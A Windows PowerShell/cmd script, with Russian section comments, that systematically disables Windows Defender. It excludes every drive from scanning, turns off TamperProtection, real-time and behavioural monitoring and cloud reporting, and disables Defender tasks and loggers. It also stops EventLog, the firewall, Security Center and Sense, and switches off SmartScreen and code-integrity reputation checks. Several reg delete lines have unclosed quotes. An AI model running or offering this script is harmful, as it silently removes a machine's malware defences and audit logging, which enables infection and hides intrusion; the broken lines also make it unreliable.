# 1. Создание и наполнение исключений для путей диска
(ni "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -force)>$null
((gdr -psp FileSystem).Root |% {New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -n $_ -pr string -v "" -force; Add-MpPreference -ExclusionPath $_ -force})>$null

# 2. Отключение контролируемого доступа к папкам
Set-MpPreference -EnableControlledFolderAccess Disabled

# 3. Отключение TamperProtection
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f

# 4. Отключение служб SgrmBroker и SecurityHealthService
(("SgrmBroker","SecurityHealthService") |% {reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f})>$null

# 5. Отключение всех уведомлений Windows Defender и системы
reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SmartAppControl" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 1 /f
(('EnableNotifications','EnableToastApplicationNotification','NOC_GLOBAL_SETTING_TOASTS_ENABLED') |% {reg add 'HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings' /v $_ /t REG_DWORD /d 0 /f})>$null
(('DisableMonitoring','DisableNotifications','DisableAlerts','DisableNotificationsUI','DisableEnhancedNotifications','DisableNotificationCenter') |% {reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' /v $_ /t REG_DWORD /d 1 /f})>$null

# 6. Политики отключения Windows Defender и его компонентов
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

# 7. Отключение WMI Autologger для Defender
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d 0 /f

# 8. Отключение задач планировщика Windows Defender
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

# 9. Удаление автозагрузок SecurityHealth
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth /f

# 10. Удаление контекстных меню EPP
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP /f

# 11. Отключение основных служб защиты
(('EventLog','Wecsvc','mpssvc','wscsvc','wcifs','Sense') |% {spsv $_ -force -ea 0; Set-Service $_ -StartupType Disabled -ea 0})>$null
(("WdBoot","MDCoreSvc","WdFilter","WdNisDrv","WdNisSvc","WinDefend") |% {reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f})>$null
(("webthreatdefsvc","webthreatdefusersvc") |% {sc config $_ start= disabled})>$null

# 12. Отключение SmartScreen и связанных функций
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d Off /f
reg add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d 0 /f
(('SvcEnabled','ServiceStart','ServiceState') |% {reg add 'HKLM\SYSTEM\CurrentControlSet\Control\CI' /v $_ /t REG_DWORD /d 0 /f})>$null

pause